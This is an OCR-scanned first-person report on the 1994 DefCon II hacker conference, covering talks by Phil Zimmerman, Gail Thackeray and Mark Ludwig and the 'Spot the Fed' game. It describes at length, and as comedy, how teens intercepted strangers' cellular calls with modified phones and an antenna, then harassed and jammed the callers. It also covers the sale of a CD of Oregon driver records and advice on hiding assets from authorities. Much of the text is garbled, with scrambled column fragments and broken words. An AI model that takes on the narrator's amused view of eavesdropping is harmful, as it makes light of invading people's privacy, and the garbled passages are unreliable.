arrived and we were anxiously awaiting the opening ceremonies. 
But, here is where Jeff’s lack of experience came in. The kick- 
off speaker was supposed to be Mark Ludwig of virus writing fame 
and controversy. But, he wasn’t there! 


He had jet lag. 


"From Phoenix?" I exclaimed in mock horror to which nearby hack\037 
ers saw the absurdity of a 45 minute flight jet lag. Mark has a 
small frame and looks, well, downright weak, so I figured maybe 
flying and his constitution just didn’t get along and he was 
massaging his swollen adenoids in his room. 


"Oh, no! He’s just come in from Australia. . a Well that 
explains it, alright! Sorry for the aspersions, Mark. 


But Jeff didn’t have a back up plan. He was screwed. Almost four 
hundred people in the audience and nothing to tell them. So, and 
I can’t quite believe it, one human being who had obviously never 
stood in front of a live audience before got up in an impromptu 
attempt at stand up comedy. The audience was ready for almost 
anything entertaining but this guy wasn’t. Admittedly it was a 
tough spot, but 


"How do you turn a 486 into an 8088?" 


"Add Windows." Groan. Groan. 


"What’s this?" Picture the middle thr fingers of your right 
hand wiggling madly. 


"An encrypted this!" Now hold out just the middle finger. 
Groan. Groan. 
"What’s this?" Spread your legs slightly apart, extend both 


hands to the front and move them around quickly in small circles. 


"Group Air Mouse." Groan. 


The evening groaned on with no Mark nor any able sharp witted 
comedian in sight. 


Phil Zimmerman wrote PGP and is a God, if not Cyber-Christ him\037 
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self to much of the global electronic world. Preferring to call 
himself a folk hero (even the Wall Street Journal used that term) 
Phil’s diminutive height combined with a few too many pounds) and 

a sweet as sweet can be smile earn him the title of Pillsbury 
Dough Boy look alike. Phil is simply too nice a guy to be em\037 
broiled in a Federal investigation to determine if he brok th 

law by having PGP put on a net site. You see, the Feds still 
think they can control Cyberspace, and thereby maintain antique 


export laws: "Thou shalt not export crypto without our approval" 
sayeth the NSA using the Department of Commerce as a whipping boy 
mouth piece. So now Phil faces 41-51 months of mandatory jail 


time if prosecuted and convicted of these absurd laws. 


Flying in from Colorado, his appearance was anxiously awaited. 
"He’s really coming?" " I wonder what he’s like?" (Like every\037 
one else, fool, just different.) When he did arrive, his shit-— 
eating grin which really isn’t a shit-eating grin, it’s just 
Phil’s own patented grin, preceeded him down the hallway. 


"Here he is!" "It’s Phil Zimmerman." Get down and bow. "Hey, 
hil the PGP dude is here." 


tg 


He was instantly surrounded by those who recognize him and by 
those who don’t but want to feel like part of the in-crowd. 
Cc 
a 


hat chat, shit-eating grin, good war stories and G-rated pleas\037 
ntries. Phil was doing what he does best: building up the folk 
hero image of himself. His engaging personality (even though he 
can’t snorkel to save his ass) mesmerized the young-uns of the 
group. "You’re Phil?" 


"Yeah." No arrogance, just a warm country shit-eating grin 
that’s not really shit-eating. Just Phil being Phil. He plays 
the part perfectly. 


Despite the attention, the fame, the glory (money? nah . . .) the 
notoriety and the displeased eyes of onlooking Computer Cops who 
really do believe he belongs in jail for 4 years, Phil had a 
problem tonight. A real problem. 


"I don’t have a room!" he quietly told Jeff at the desk. "They 
say I’m not registered." No panic. Just a shit-eating grin 
that’s not a shit-eating grin and hand the problem over to the 
experts: in this case Jeff Moss. Back to his endearing fans. 
Phil is so damned kind I actually saw him giving Cryptography 101 
lessons on the corner of a T-shirt encrusted table. "This is 

plaintext and this is crypto. A key is like a key to your hotel 
rooms ¢ .." If only Phil had a hotel room. 

Someone had screwed up. Damn computers. So the search was on. 


What had happened to Phil’s room? Jeff is scrambling and trying 
to get the hotel to rectify the situation. Everyone was abuzz. 
Phil, the crypto-God himself was left out in the cold. What 
would he do? 


When suddenly, out of the din in the halls, we heard one voice 
above all the rest: 


"Phil can sleep with me!" 


Silence. Dead stone cold silence. Haunting silence like right 
after an earthquake and even the grubs and millipedes are _ so 
shaken they have nothing to say. Silence. 


The poor kid who had somehow instructed his brain to utter the 
words and permitted them to rise through his esophagus and out 
over his lips stood the object of awe, incredulity and mental 
question marks. He must have thought to himself, "what’s every\037 
one staring at? What’s going on? Let me in on it." For the 
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longest 10 seconds in the history of civilization he had abso\037 
lutely no clue that he was the target of attention. A handful of 
people even took two or three steps back, just in case. Just in 
case of what was never openly discussed, but nonetheless, just in 
case. 


And then the brain kicked in and a weak sheepish smile of guilt 
overcame this cute acne-fr baby-butt smooth-faced hacker who 
had certainly never had a shave, and was barely old enough to 
steer his own pram. 


"Ohhhhhh . . . . noooooo," he said barely louder than a whisper. 
"That’ not what I mean!" 


I nearly peed laughing so hard in unison with a score of hackers 
who agreed that these misspoken words put this guy in the unenvi\037 
able position of being the recipient of a weekend of eternal 
politically incorrect ridicule. 


"Yeah, right. We know what you mean... " 


"No really .. ." he pleaded as the verbal assaults on his = al\037 
leged sexual preferences were slung one after the other. 


This poor kid never read Shakespeare: "He who doth protest too 
MUGh: Gee 4°" 


If we couldn’t have a great kickoff speech, or comedian, this 
would have to do. 


The majority of the evening was spent making acquaintances: 


"Hi, I’m Jim. Oops, I mean ’Septic Tank," was greeted with "Oh, 
you’re Septic. I’m Sour Milk." (Vive la difference!) Peopl who 
know each other electronically are as surprised to meet their 
counterparts as are first daters who are in love with the voice 
a 
t 


t the other end of the phone. "Giving good phone" implies one 
hing while "Having a great keystroke" just might mean another. 


The din of the crowd was generally penetrated by the sounds of a 
quasi-pornographic Japanese high tech toon of questionable so\037 
cially redeeming value which a majority of the crowd appeared to 
both enjoy and understand. I am guilty of neither by reason of 
antiquity. 


And so it goes. 


kK kK kK kK OK 


Phil Zimmerman must have gotten a room and some sleep becaus at 
10AM (or closely thereafter) he gave a rousing (some might say 
incendiary) speech strongly attacking the government’s nearly 


indefensible position on export control 


I was really impressed. Knowing Phil for some time, this was the 
first time I ever heard him speak and he did quite an admirable 
job. He ad libs, talks about what he want to talk about and does 
so in a compelling and emotional way. His ass is on the line and 
he should be emotional about it. The audience, indeed much of 
counter culture Cyberspace loves Phil and just about anything he 
has to say. His affable 40-something attorney from Colorado, 
Phil DuBois was there to both enjoy the festivities and, I’m 
sure, to keep tabs on Phil’s vocalizations. Phil is almost too 
honest and open for his own good. Rounds and rounds of sincere 
appreciation. 
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Hey kids, now it’s time for another round of Spot The Fed. 
Here’s your chance to win one of these wonderful "I Spotted A 
Fed" T-shirts. And all you have to do is ID a fed and it’s yours. 
Look around you? Is he a Fed? Is she under cover or under the 


covers? Heh, heh. Spot the Fed and win a prize. This one-size- 
fits-all XXX Large T-shirt is yours if you Spot the Fed. I had 
to keep silent. That would have been cheating. I hang out = on 


both sides and have a reputation to maintain. 


"Hey, I s one" screeched a female voice (or parhaps it was 
Phil’s young admirer) from the left side of the 400+ seat ball\037 
room. Chaos! Where? Where? Where’s the fed? Like when Jose 


Consenko hits one towards the center field fenc and 70,000 
screaming fans stand on their seats to get a better view of a 
three inch ball 1/4 mile away flying at 150 miles per hour, this 
crowd stood like Lemmings in view of Valhalla the Cliff to espy 
the Fed. Where’s the Fed? 


Jeff jumped off the stage in anxious anticipation that yet anoth\037 
er anti-freedom-repressive law enforcement person had blown his 
cover. Where’s the Fed? Jeff is searching for the accuser and 
the accused. Where’s the Fed? Craned necks as far as the eye 
can see; no better than rubber neckers on Highway 95 looking for 
steams of blood and misplaced body parts they half expected a Fed 
to be as distinctly obvious as Quasimoto skulking under the 
Gorgoyled parapits of Notre Dame. No such luck. They look like 
you and me. (Not me.) Where’s the Fed? 


He’s getting closer, closer to the Fed. Is it a Fed? Are you a 
Fed? C’mon, fess up. You’re aa fed. Nailed. Busted. Psyche! 


Here’s your T-shirt. More fun than Monty Hall bringing out 
aliens from behind Door #3 on the X-Files. Good clean fun. But 
they didn’t get ’em all. A couple of them were real good. Must 
hav been dressed like an Hawaiian surf bum or banshee from 
Hellfire, Oregon. Kudos to those Feds I know never got’ spotted. 
Next year, guys. There’s always next year. 


Phil’s notoriety and the presence of the Phoenix, Arizona prosecu\037 
tor who was largely responsible for the dubiously effective or 
righteous Operation Sun Devil, Gail Thackeray ("I change job 
every 4 years or so - right after an election") brought out’ the 
media. The LA TV station thought they might have the makings of 

a story and sent a film crew for the event. 


"They’re Feds. The ones with the cameras are Feds. I know it. Go 
ask ’em." No need. Not. 

"Put away that camera." At hacking events it’s proper tiquett 
to ask if people are camera shy before shooting. The guy that I 


was sitting next to buried his face in his hands to avoid being 
captured on video tape. 


"What are you; a Fed or a felon?" I had to ask. 
"What’s the difference," his said. "They’re the same thing." So 


which was it, I wondered. For the truly paranoid by the truly 
paranoid. 


"Get that thing outta here," he motioned to the film crew who 
willingly obliged by turning off the lights. "They’re really 
Feds," he whispered to me loud enough for the row in front and 
behind us to hear. 


I moved on. Can’t take chances with personal safety when I have 
kids to feed. Fed or felon, he scared me. 


Gail Thackeray was the next act on stage. She was less in agree\037 
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ment about Phil Zimmerman than probably anyone (except th 


unde\037 


tected Feds) in the audience. She, as expected, endorsed mu 
the law enforcement programs that revolve around various 
management (escrow) schemes. Phil recalls a letter from 
that describe how the freedom fighters use PGP to defend 
selves against repression. He cites the letter from Latvia 
says electronic freedom as offered by PGP is one of the 
hopes for the future of a free Russia. Gail empathizes but 
trouble closer to home. Terrorism a la World Trade Center 


ch of 
key 

Burma 

them\037 
that 

only 
sees 

, or 


rocket launchers at O’Hare Airport, or little girl snuff films in 


Richmond, Virginia, or the attempt to poison the water s 
outside of Boston. These are the real threats to America in 
post Cold War era. 


"What about our personal privacy!" cries a voice. "We don’t 
the government listening in. It’s Big Brother 10 years b 
schedule." 


Gail is amused. She knew it would be a tough audience and 
been through it before. She is not shaken in the least. 


"I’ve read your mail," she responds. "Its not all that inte 
ing." The audience appreciates a good repartee. "You gotta 
me to do this, and frankly most of it is pretty boring." 

successful made her point and kept the audience laughing all 
way. 


She then proceeded to tell that as she sees it, "The expect 
of privacy isn’t real." I really don’t like hearing this f 
believe in the need for an Electronic Bill of Rights. I ss 
think she’s wrong. "History is clear," she said "the abili 
listen in used to be limited to the very few. The telegraph 
essentially a party line and still today in some rural 

communications aren’t private. Why should we change it now 


"Gail, you’re so full of shit!" A loud voice bellowed from 
to me again. Boy can I pick seats. "You know perfectly well 
cops abuse the laws and this will just make their jobs ea 


upply 
the 


want 
ehind 


has 


rest\037 
pay 
She 
the 


ation 
Or lh 
imply 
ty to 

was 


areas 
ow 


next 
that 
sier. 
ng it 
los\037 
just 
ause. 
his 
f£Con 


Once people find a way to escape tyranny you all want to bri 
right back again. This is revolution and you’re scared of 

ing. This kind of puke scum you’re vomiting disgusts me. I 
can’t take it any more. " Yeah, right on. Scattered appl 
While this ‘’gent’ may have stated what was on many minds, 
manner was most unbefitting a conference and indeed, even D 
TEs This was too rude even for a hacker get-together. The 
with the overbearing comments sat down apologizing. "She 

gets me going, she really does. Really pisses me off when 
goes on like about how clean the Feds are. She knows better 


to run diarrhea of the mouth like that." 


"You know," she continued. "Right across the street is a 
Shop. One of those retail stores where you can buy bugs and 
and eavesdropping equipment?" The audience silently nodded. 


as law enforcement are prohibited by law from shopping there 
buying those same things anyone else can. We’re losing on 
front." Cheers. Screw the Feds. 


man 
just 

she 
than 


Spy 
taps 
"We 
and 
that 
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(Cyber Christ Meets Lady Luck Continued) 


I don’t agree with everything that Gail says, but she is a com\037 
pelling speaker; she believes in what she says. But I do agree 
with her on the difficulty of forensic evidence in computer 
cases. 


"I got really mad," she said. "I was reading a magazine and 
there was an ad for United, you know, th mploy owned airline. 
And it was a beautiful ad, hundred of employees standing in front 

of a brand new great big jet. All smiling and happy." Gail then 

frowned deeply. "Some stockholder ought to sue them for mislead\037 
ing advertising." This was more like it! Go, Gail! "I started 
t 
f 
W 


o look at the picture carefully and I noticed this unmistakably 
at lady in a pink dress. And then over a few persons. . -guess 
hat? The same fat lady in pink." Roars of laughter and ap\037 
plause. 


Her point? What seems real may not be real at all, and with a few 
hundred dollars in software and a little practice, most anyone 
can build a false reality digitally. 


Her time was up but the audience wanted more. She was mobbed for 
eternity by hackers who fight her tooth and nail but respect her 
comportment enough to make the disagreements lively, partisan, 
entertaining, but with respect. Respectful hackers. No HoHoCon 
orgies; merely verbal barbs with no solution. Everyone knew that, 
but it’s the battle that counts. 


More security conference should be this open, this honest and 
informative, with all kinds of people with all kinds of opinions. 
That is how we, and I, learn. Listen and learn. And all for 
$5000 no less, plus a paltry $15 entrance fee. 


Re SK 


The afternoon sessions were filled with a mixture of anti-govern\037 
ment, pro-privacy advocacy, virus workshops and such by both 


under and above ground folks. Padgett Peterson’s knowledge of 
viruses is deep and he spread the same wisdom as his does in so 
called legitimate circles. Knowledge is knowledge, and better 


accurate than wrong. 


It’s often surprising to see how people will voice the same 
opinion in varying degree of intensity depending upon their 
audience. Mark Aldrich of General Research Corp. in the Washing\037 
ton area made a statement that I doubt I would hear at a ConCon. 
"Fear your government that fears your crypto. Use crypto as 

a weapon." Sara Gordon’s panel discussion on crypto and privacy 
and related topics fueled the audience’s general anti-fed atti\037 
tude. 


"IT was bugged by the Feds." "So was I?" "What can we do about 
a "Yeah, they listen in on my phones, too. I can hear the 
elacks:.™ Right: 


As Mark so succinctly put it, "if the government wants to bug 
you, you’ll never know. They’re that good.". That kind of shut 
up the dilettante paranoids in the group, albeit mumbling that 
they just knew that they were the victim of one of the 900 or so 
court approved wire taps last year. Right. I think Gail was 
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right: some of you guys are too boring to be believed. 


The afternoon edition of the Spot A Fed contest took us on the 
run. I actually succombed to their enthusiasm and a general lack 
of better judgement and followed a group of 8 or 10 to unmask an 
unmarked white van in the parking lot. 


"It’s the Feds." "How do you know?" "Oh, it’s the Feds alright." 
"How do you know." "It’s a white van and the intelligenc serv\037 
ices use white vans." "What are you going to do?" "Bust ‘’em." 
"Bust ’em for what?" "For being Feds." 


This motley crew traipsed through the mile long casino, trodding 
upon the ugly tartan/paisley carpets so obnoxiously loud a_ blind 
man could cry "Uncle!", into the Hall of Overpriced Shoppes 
through the lobby and over to the parking garage. We had to have 
$100,000 of surveillance gear in tow: (enough to detect the planet 


Pluto fart in b-flat). Radio receivers and eavesdropping equip\037 
ment were courtesy of my pal Mike Peros. The goal was, if this 
was a Fed van, we could hear it. I don’t think so, but I go for 


the ride and a few minutes of reprieve away from the conference 
hall. 


As we near, the excitement grows among the more paranoid who are 
trying to instill their own mental foibles into their companions 
and sheer terror in normal old Vegas visitors who have no_ idea 
what they’ve walked into. 


Feds? Not. Surrepticious radio transmissions? Just hotel securi\037 
ty tracking the movements of 8 or 10 paranoids (and one writer 
with nothing else to do for a half hour) into a parking garage 
which has more cameras than NBC. Feds? Of course not. Don’t be 
ridiculous. 


KO SRR 


To say nothing worthwhile occurred until 11PM that evening would 

be lying, but this thing, this DefCon II thing, was turning into 
what I would have called 25 years ago, a Love-In. The partici\037 
pants were giddy from the event, the camaraderie, the $1 Heinek\037 
ens and the hacking. The Sahara was actually pretty good about 
it. Jeff got the conference space for fr because h guaranteed 
that at least 100 hotel rooms would be booked by "computer en\037 
thusiasts coming to a small computer conference." Little did the 
hotel know that half the crowd was too young to drink, too broke 

to gamble, and conspicuous enough to ward off legitimate clients. 
But a deal’s a deal. 


The hotel operators went out of their way and allegedly gave the 
hackers permission to hack through the PBX in order to provide a 
SLPP connection. 


"Just put it back the way you found it when you’re done," was the 
hotel’s only and quite reasonable request. 


In my day an equivalent event producing an equivalent social non- 
drug induced high would have been achieved by tossing a Frisbee 


to Grace Slick (Lead singer Jefferson Airplane) and have her 
throw it back. We didn’t have the kind of technology that today’s 
rebellious age has. We had the Beatles and Jimi Hendrix, safe 


sex (kinda), safe drugs (well, maybe a little safer) and a cause. 
But no technology to speak of. 


When I was on the publishing staff of the New York City Free 
Press in 1968/9 we wrote our anti-establishment diatribes by 
hand. By hand! And then we went down to a dark office late at 
night to use their typesetting gear when it was idle. It took no 
more than a blushing glance around the room to realize that we 
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impressionable teens were publishing our political extremisms on 
equipment courtesy of Al Goldstein and Screw magazine. Now that 
was an education. 


DefCon II was a Love-In, technology and all. 


Come 11PM yet another speaker canceled so I offered to chat to 


the crowd for a half hour or so on Van Eck radiation; the emis\037 
sions from CRT’s that make video screens readable from a dis\037 


tance. Now this wasn’t a fill in at 2PM or anything. Sessions 
reconvened at 11PM and I spoke to a full audience who were there 
to get a midnight lesson in cellular hacking. 


Most above ground types still believe that hacking is an acne- 
faced teenager, chigging Jolt Cola, wolfing down pepperoni 


pizza and causing Corporate America no end of grief. To a cer\037 
tain extent some of this is true. But hacking is so much more. 

As Rop Gongrijjp, editor of Hacktic once told me, "hacking is 
disrespect of technology." It’s going the extra mile to find out 


how things work. Many of the older hackers, those in their early 
20’s and older, are migrating from the conventional dial-em-up 
and break-in hacking image to the fine art of cellular hacking. 
How do these things work? What are the frequencies? How can I 


customize my phone? How many channels can I scan? The possibil\037 


ities are endless as I soon learned. 


Jim and Bill (fake names) asked if I wanted to s a great demo. 
Sure! No names, they said. OK. No problem. In one of the 


several thousand hotel rooms at the Sahara was a pile of equip\037 


ment to make an under budgeted FBI surveillance team insanely 
jealous. There in the middle of the ridiculously filthy room that 
no doubt caused the maid to shudder, sat a log periodic antenna 
poised atop a strong and highly adjustable photographic-style 
tripod. Feeding the antenna was a hunk of coax attached to a 
cell phone’s antenna jack. 


OK, so what’s that? Free cell calls? No, much more. 


A second cell phone/scanner, an Oki 900 was modified and connect\037 


ed to a laptop computer. (This was the exact modification being 


discussed downstairs) Custom software that was freely distrib\037 


uted around DefCon scanned the data from the Oki and displayed 
the scanning activity. A pair of speakers then audibly broadcast 
the specific conversation. And in Vegas, you can imagine what 
was going over the open airwaves! 


A half dozen /’kids’ sat around enthralled, each begging for his 
turn to, as Jim put it, “harass cellular users. Pure and simple. 
Harassment. Stomp on the son of a bitch," he laughed, joined in 
by the others. 


When a ’good’ conversation was detected, they entered the channel 
into the broadcasting cell phone and spoke. And talk they did. 
Essentially they turned ’private’ conversations into wide-band 


free-for-alls. If they spoke for only a few seconds one or both 
of the parties could hear what was being said. If they talked 
for too long, the overpowering signal from the antenna would 


literally wipe out the chat: the cell switch reacted with an 
internal belch and shut down. Stomping, they called it. 


For those on the receiving end of the harassment, it must have 
sounded lik the overbearing voice of God telling Noah how to 
build the Ark. 


"Noah?" 


"Who dat? 
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"Noah?" 
"Who is that?" 
What terror lurks in the minds of boys 


For those old enough to remember, stomping is no more a_= stunt 
than putting a 500 watt linear power amplifier on a CB radio and 


blasting nearby CB’s to kingdom come. The truckers used to do it 
to 4-wheelers. When the police began monitoring CB channels "to 
protect and serve" they became the target of CB stomping. So 


what else is new? 


I gotta give it to them: these characters designed and built the 
software, modified the phones and put it all together and it 
works! Not bad on a $3 allowance and a 10th grade education. 
Now, I guess what they did may have been sort of illegal, or at 
least highly unethical and definitely not nice. But I have to 
admit, some of what I witnessed was very, very, funny. I’m _ not 
advocating this kind of activity, but much like Candid Camera 
broke into people’s lives to capture their reactions, cellular 


hacking is similarly amusing. The hacker/phreaks particularly 
enjoyed breaking in on fighting couples. (I counted six impend\037 
ing divorces.) Almost without exception the man was in a car and 


the lady was at a fixed location; presumably, home. 


Him: "Where the hell have you been." 

Her: "Nowhere." 

Him: "Bullshit. 

Her: "Really honey . .." Defensively. 

Him: "Who’s with you?" Intense anger. 
Hacker: "Don’t believe her. She’s a whore." 
Him: "What was that?" 

Her: "What?" 


"That voice." 
"What voice?" 


Hacker: "Me you asshole. Can’t you see she’s playing you for a 
fool." 
"I know she is." He agrees. 


"What’s that honey?" 

"I know he’s there with you." 

"Who?" Incredulous. 

"Him . . . whoever you’re fucking when I’m at work." 
Hacker: "Yeah, it’s me." 


"Shit! Who the fuck is there?" 

"No one!" 

"I can hear him, he’s there. You’re both making fun of me..." 
Hacker: "She’s laughing at you, man." 

"No shit. Who the fuck are you?" 

Hacker: "The guy who takes care of her when you can’t, asshole." 
"That's, tt." “Click. 


Drug dealers aren’t immune to these antics. 


"Where’s the meet?" 

"By the 7/11 on Tropicana." 
"You got it?" 

"You got the cash?" 


"Yeah, dude." 

"Be sure you do." 

Hacker: "He doesn’t have the cash my man. He’s gonna rip you 
off." 

"What?" "What?" Both sides heard the intruder’s voice. "Who is 
that?" 


"What’s that about a rip-off?" 
"This ain’t no rip-off man." 
Hacker: "Yes it is. Tell ’em the truth. You gonna take his drugs 
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and shoot his ass. Right? Tell ’em." 

"You gonna rip me off?" 

"No, man!" 

"Your homeboy says you gonna try and rip me off?" 

"What home boy?" 

Hacker: "Me, you bozo drug freak. Don’t you know that shit can 
kill you?" 

Click. 


Good samaritanism pays off upon occasion. 


"Honey, hurry up." 

"I’m on the freeway. I’m coming." 

Hacker: "He’s late. lLet’s save her ass." 

"What was that?" "What did you say honey?" 

"He said he was going to save your ass." 

"Who did?" 

"The guy on the radio." (Technical ignorance abounds.) 

Hacker: "Me. You’re late and she’s scared so we’re gonna beat 
you there and make her safe." 

"Who the hell is that?" "Who?" "The guy with you?" "There’s no 
one here." "He says he’s gonna beat me there and pick you up." 
Hacker: "Damn right we are." 

"Hey, this is cool. Who’s there?" 

Hacker: "Cyber Christ talking to you from Silicon Heaven." 

"No shit. Really?" 

Hacker: "Yeah, (choke, choke,) really." 

"What’s happening, honey." 


"I don’t know, for sure. He says it’s God." 
"God!?!2" 
Hacker: "Close enough. Listen, you sound alright. Go get your 


woman, man Keep her safe." 
"No problem. Uh, thanks." 
Click. 


Around 4AM, I guess it was, the hacker/phreaks definitely helped 
out law enforcement. One end of the conversation was coming from 
inside a hotel, maybe even the Sahara. The other from another 
cell phone, most likely in the lobby. 


"What do you look like?" 

"I’m five foot nine, thinning brown hair and 180 pounds I wear 
round glasses and .." 

"I get the idea. Where are you now?" 

"I’m coming down the elevator now. What do you look like?" 

"I’m six foot one in my heels, have long blond spiked hair and 
black fishnet stockings." 


Hacker: "Don’t go man. It’s a bust." 
"What?" he said. 
Hacker: "Don’t go, it’s a bust. You don’t want your name in the 


papers, do ya?" 

"What the fuck?" she yelled. 

"There’s a guy who says this is a bust?" 
"Bust? What bust?" 


Hacker: "That’s the clue, man. She’s denying it. Of course it’s 
a bust. Is it worth a night in jail to not get laid?" 
"Shit." He whispers not too quietly to another male companion. 


"There’s some guy on the phone who says it’s bust. What should we 
do. 
Hacker: "I’m telling you man, don’t go," 


"This ain’t worth it. I’m going back upstairs." 
Click. 


A couple of hours later the same hooker was overheard talking to 
one of her work mates. 


"Then this asshole says it’s a bust. Cost me $300 in lost busi\037 
ness, shit." 
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"Y¥OUy» “BOO? Same shit been going on all night long. What the 
fuck?" 


Wow. And it seems like only this morning that my toilet explod\037 
ed. 


wk kK kK kK 


So what’s a perfectly groomed and slightly rotund 50-something 
convicted methamphetamine dealer doing at DefCon II with hundreds 
of impressionable teenagers? You might well ask. 


So I’1l1 tell you. 


Sitting in yet another Saharan hell-hole of a room they unabash\037 
edly market for $55 per night I encountered hackers #1 through #4 
and this .. . I immediately thought, elderly gent. He said 
nothing and neither did I, thinking that he might have been an 
over aged chaperone for delinquent teens or perhaps even an 
understanding Fed. But the gallon jugs of whiskey was depleting 
itself right before my eyes, as if a straw from Heaven sucked the 
manna from its innards. Actually, it was Bootleg. 


Not bootleg liquor, mind you, but Bootleg the felonious con from 
Oregon. Apparently he got busted ’cause speed is and was against 
the law, and crank is not exactly the drug choice of maiden aunts 


nor school marms. "I’ve been a hacker longer than some of these 
kids have been alive. It all started back in..." and Mike 
"Bootleg" Beketic commenced on the first of hundreds of war-story 
jail house tales to entertain him and us. Bootleg loves a_ good 
story. 

"Jail ain’t so bad," he bragged with a huge whiskey smile. "No 
one fucked with me. You gotta make friends early on. Then it’s 
OK." Good advice, I guess. "On parole I got slammed with a year 
for piss that didn’t pass." Gotta be clean, my man. Stay away 


from that shit. It’1ll1 kill you and your teeth will rot. 


Bootleg handed me form PROB-37, (Rev. 1/94) from the United 
States District Court, Federal Probation System. Grins from ear 
to ear. A badge of honor for villains, thieves, and scoundrels. 
Sounds like they need their own union. 


This was the official "Permission To Travel" form dated June 16, 
1994 which gave Bootleg the legal right to travel from Oregon to 
Las Vegas in the dead of the summer to attend a "computer conven\037 


Eon." The flight times were specific as were the conditions of 
his freedom. He had to inform the local cops that he was in 
town. In case any crimes occurred throughout the city of Las 


Vegas during his sojourn, he was an easily identifiable suspect. 


While he downed another Jack and coke I found out what Bootleg 
was really doing. Despite the fact that the "Federal Keep Track 

of a Crook Travel Form" said, “you are prohibited from advertis\037 
ing or selling your DMV CD," the paranoia that runs rampant 
through the minds of prison bureaucracy was actually in this case 
quite correctly concerned. 


"What’s a DMV CD?" 


"I’m glad you asked." I was set up. The edict said he couldn’t 
sell or advertise, but there was no provision stating that he 
couldn’t answer questions from an inquiring mind. 


Bootleg handed me a CD ROM: 


Bootleg Presents: 
DMV 
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—- Over 2 Million Oregon Drivers License Records 
—- Over 3 Million Oregon License Plate Records 


The inside jacket clearly stated that this information was not to 
be used by any creatively nefarious types for any sort of person\037 
al Information Warfare tactics. It warns, 


Do not use this CD to: 


—- Make phony Licenses 

— Make phony Titles 

—- Obtain phony I.D. 

- Harass Politicians, Cops or Journalists 
-— Stalk Celebrities 

— Get ME in trouble <G> 


I can come up with at least 1001 other uses for this collection 

of information that the Oregon authorities are none too happy 
about. The ones Bootleg outlined never came into my mind. 
(Heh!) Bootleg acquired the information legally. State officials 
were kind enough to violate the electronic souls of its citizens 

by sending Bootleg their driver’s information magnetically embla\037 
zoned on a 3600 foot long piece of 9 track acetate. Now they 
want to change the law to reflect "heart felt concern for the 
privacy of their citizens." Get a clue, or if none’s available, 
buy one from Vanna. 


Bootleg is moving onto the next 47 states (California and New 
York don’t permit this kind of shenanigans) shortly to make sure 
that everyone has equal access. Hacking? Of course. Bootleg 
effectively hacked the Oregon DMV with their blessing and tax 
payer paid-for assistance. 


Time to go back to my room while Bootleg and friends spent an 
evening of apparently unsuccessful whoring around the Strip and 
Glitter Gulch. 

A good time was had by all. 


kK kK kK kK Ok 


Jeff Moss opened the Sunday morning session with an ominous 
sermon. 


"You'll notice that the wet bar is missing from the rear?" It 
had been there yesterday. Everyone turns around to- look. wr 
gotta pay for the damage ..." Jeff was not a happy camper. 
"They have my credit card number and it’s almost full. So cool 
it!" But the show must go on and we had more to learn. 

Next. Anonymous mailers on the net? Forget about it. No such 


thing. Anonymous remailers, even if they are in Norway or Finland 
or some such other country where American information contraband 
such as child pornography is legal, are only as safe and secure 
as the people who run it 


"The FBI can go over any time they want and look up who you are 
and what kinds of stuff you swallow down your digital throat," 
one speaker announced. Of course that’s ridiculous. The FBI 
would have to call in the Boy Scouts or Russian Mafia for that 
kind of operation, but we all knew that anyway. A slight slip of 
the ad lib tongue. No harm done. 


I didn’t know, until this Sunday, that there were actually real 
live versions of "Pump Up The Volume" running rampant across’ the 
country, impinging their commercial-free low power radio broad\037 
casts into an electromagnetic spectrum owned and operated by the 
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Federal Communications Commission. And, as to be expected, the 
FCC is trying to put these relatively harmless stations out of 
business along with Howard Stern and Don Imus. One would think 
that WABC or KLAC or any other major market stations would little 
care if a podunk 20 watt radio station was squeezing in between 
assigned frequencies. And they probably shouldn’t. But, as we 
learned, the Military lent an innocent hand. 


In support of the hobbies of servicemen, a local San Francisco 
base commander gave approval for a group of soldiers to establish 
a small, low power radio station for the base. Good for morale, 
keep the men out of the bars: you know the bit. 


But the ballistic missiles went off when the nation’s premier 
rating service, Arbitron, listed KFREE as a top local station in 
the San Francisco market. 


"What station KFREE?" "Who the hell are they?" "What the fuck?" 


= 
G 


Needless to say, KFREE was costing the legitimate radio stations 
money becaus advertising rates are based upon the number of 
listeners not up and peeing during commercials. Since KFREE was 
ad-free, no contest. Arbitron assumes the rating to relect the 
existence of a real station the numbers are ther and the 
local stations call the FCC and the FCC calls the base and as 
quick as you can scream, "Feds suck!" KFREE 


L?]. 


EF is off the air. 


Stomp. 


I was scheduled to speak today, but with the schedul seemingly 
slipping forward and backward at random haphazard intervals, 
there was no telling when what would occur. Mark Ludwig, of 
V 
Bl 


irus Writing Contest fame and author of the much touted "Little 
lack Book of Computer Viruses" Virus gave a less then impas\037 
Sioned speech about the evils of government. 


"T know most of you don’t have any assets other than your comput\037 


er," Ludwig said to the poverty stricken masses of DefCon II. 
"But you will, and you want to make sure the government doesn’t 
come crashing down around you whenever they want. They can and 
will take your life away if it suits them. There is no fourth 
amendment. Most search and seizures are illegal." And so it 
went. 


"Put your money off shore, kids," said Dr. Ludwig the theoretical 
physicist. "Find a good friendly country with flexible banking 
laws and the Feds can’t get you." 


"And when the Feds do come for you, make sure that your entire 
life is on your computer. Rip up the papers after you scan them 
in. Your all-electronic life cannot be penetrated specially 
if you get a case of the forgets. ‘Oops, I forgot my password. 
Oops! I forgot my encryption key. Oops! I forgot my name.’" 


"Even your VISA and Mastercard accounts should be from overseas. 
Keep it out of the US and you’ll be all the better for it." For 
those interested in such alternative, Ludwig recommends that you 
call Mark Nestman: of LPP Ltd. at 800-528-0559 or 702-885-2509. 
Tell 
a 
P 


0) 


him you want to move your millions of rubbles and dollars 
nd Cyber-credits overseas for safe keeping because the Byzantine 
olice are at the front door as you speak. Order pamphlet 103. 


Thes are the defensive measures we can take protect ourselves 
against the emerging Police State. But offensive action is also 
called for, he says. "Help Phil Zimmerman. Send him money for 
his defense. Then, laugh at the Feds!" Haha, haha. Haha. 
Hahahahahaha. Ha! 
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."When they come to the door, just laugh at them." Haha. Haha\037 
ha. Haha. "No matter what they do, laugh at them." Hahahahaha. 
Enough of that, please. If I laugh at 6 husky beer-bellied 
Cyber-cops who have an arsenal of handguns pointed at my head, 
they might as well send me to the Group W bench to commiserate 
with Arlo Guthrie. Peeing would come before laughing. But then 
again, I’m no longer a grunged out 20 year old who can laugh in 
the face of the Grim Reaper. "Yes, ossifer, sir. I’m a cyber- 
crook. I ain’t laughing at you in your face, ossifer, sir..." 
I panic easily. Kissing ass well comes from a life long success 
of quid pro quo’ing my way from situation to situation. 


"And, now," Master Mark announced, "on to the results and awards 


for the Annual Virus Writing contest." Ludwig seemed suddenly 
depressed. "Unfortunately, we only got one legitimate entry." 
